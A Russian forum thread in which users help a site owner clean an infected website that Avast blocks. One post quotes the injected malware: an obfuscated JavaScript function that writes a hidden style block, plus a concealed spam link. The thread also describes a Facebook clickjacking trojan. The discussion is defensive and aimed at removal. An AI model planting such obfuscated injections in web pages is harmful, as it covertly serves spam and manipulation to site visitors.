Avast блокирует доступ к сайту JS:ScriptIP-inf

[Octopus]

Проблема с блокировкой сайта Австом
xhttp://makebelieve.ru/
https://www.virustotal.com/ru/url/53a260cd23e4bfb3ae3683f7ae4c9aba11293964b201a73b74fbb3f217bd72d1/analysis/
http://sitecheck.sucuri.net/results/makebelieve.ru
Avast Antiv 7 Free

[afix]

Сообщения выше в этой теме читали,Octopus?

[sergofun]

Octopus, удалите из своего сообщения прямую ссылку на сайт, например так: хттп://makebelieve.ru
Выложите скрин сообщения аваста об обнаруженном вирусе.
Анализаторы файлов ничего не нашли, код многих скриптов вынесен за страницу, просмотреть этот код не представляется возможным.

[Andrey,pro]

http://sitecheck.sucuri.net/results/makebelive.ru
найдите на Вашем сайте и удалите:

Code: [Select]

<script language="JavaScript">

function dnnViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

</script>и еще это:

Code: [Select]

<p class="dnn">By A <a href="http://www.aut son. com/" title="web design company">Web Design</a></p>Почитайте, как раз Ваш случай: http://belyan.in/2013/07/kak-najti-i-udalit-virusy-na-sajte-na-primere-mwspamseo/

Trojan.JS.Clickjack.A является скрытым JavaScript, который встроен в веб-сайты. Он использует техники клик-джекинга, о чем свидетельствует само название вредителя. Вредонос незаметно заманивает посетителей сайтов на сомнительные ссылки и объекты. Trojan.JS.Clickjack.A создает на вредоносном сайте незаметный IFRAME, который содержит привычную кнопку Facebook «мне нравится». Например, при нажатии пользователем кнопки "Play" на сайте с видео программа автоматически генерирует клик по кнопке «мне нравится».

[sergofun]

Andrey,pro, очень интересно. Я тоже проверял ссылку на сайтчек и было чисто. Если только на момент проверки скрипт был удален, а потом добавлен вновь.
Ха, вирустотал на этот скрипт молчит: https://www.virustotal.com/ru/file/1c0b5ef8e368632c4fc17c719b9860830223c5cddb0ea8c92a59474212563062/analysis/1375783580/

Понял, сайты отличаются в одну букву.
1. У ТС сайт makebelieve - этот сайт был чист, сейчас тоже заражен: http://sitecheck.sucuri.net/results/makebelieve.ru/
2. По твоей ссылке сайт makebelive (буквы "е" нет) - этот сайт заражен.
Оба сайта идентичны по содержанию.

[George Yves]

Понял, сайты отличаются в одну букву.
1. У ТС сайт makebelieve - этот сайт был чист, сейчас тоже заражен: http://sitecheck.sucuri.net/results/makebelieve.ru/
2. По твоей ссылке сайт makebelive (буквы "е" нет) - этот сайт заражен.
Оба сайта идентичны по содержанию.

Звучит как-то похоже на спуфинг - подмена сайтов.

[sergofun]

IP-адрес сайтов один и тот же. Оригинал и его доменное зеркало.

[Octopus]

Сайты одни и теже, это алисы в DNS.
Ребят как правильно подправить код, я не программист. И получается кто то взломал админку или через FTP заменил?
А так огромное спасибо, что не прошли мимо.

[Andrey,pro]

Octopus, удалите код, который я выделил в своем сообщении, пройдитесь по своему сайту, чтобы этого кода нигде не было. Пароли поменяйте от админки и от FTP. Потом, кода все сделаете, проверяйте сайт на : http://sitecheck.sucuri.net/ , пока он не покажет, что сайт чист.

[sergofun]

Octopus, повторно прошу, удалите из своего сообщения прямую ссылку на сайт, например так: хттп://makebelieve.ru
Заражение сайта подтверждено, кто-то может нечаянно кликнуть ссылку. Пользователю будет не очень приятно в случае заражения по вашей вине, а в репутацию сайта еще один минус, например, google ведет учет распространения заражения для внесения сайта в черный список.

UPD: ок, спасибо, что исправил =)

[Octopus]

Вам спасибо.
Вот не могу найти из какого места этот код выпилить. Ни кто не наведет на мысль как это лучше сделать?

[Andrey,pro]

Вот не могу найти из какого места этот код выпилить. Ни кто не наведет на мысль как это лучше сделать?

Вы просто нажмите ctrl+F в браузере и вставьте часть кода, которую я указал в сообщении, так пройдитесь по всему сайту. Также sucuri.net показывает, на каких страницах содержится вредоносный код.

[Octopus]

Это я понимаю, а как удалить этот код, допусти gallery.html я ни где найти не могу, index.php штук 100 )
Вы уж извините, я не силен в этих делах, я сетевой администратор), тут безвыходная ситуация, нужно решить эту задачку, минуя программистов, который в отпуске. Поэтому если глупые вопросы, прошу прощения.

[Andrey,pro]

проверьте сначала здесь: /modules/mod_AutsonSlideShow/tmpl/default.php если есть, то удалите оттуда вредоносный код.

[Octopus]

Да нашел)
А как правильно удалить, что бы потом не было проблем с отображением на страницах? Или удалить только то, что вы писали выше.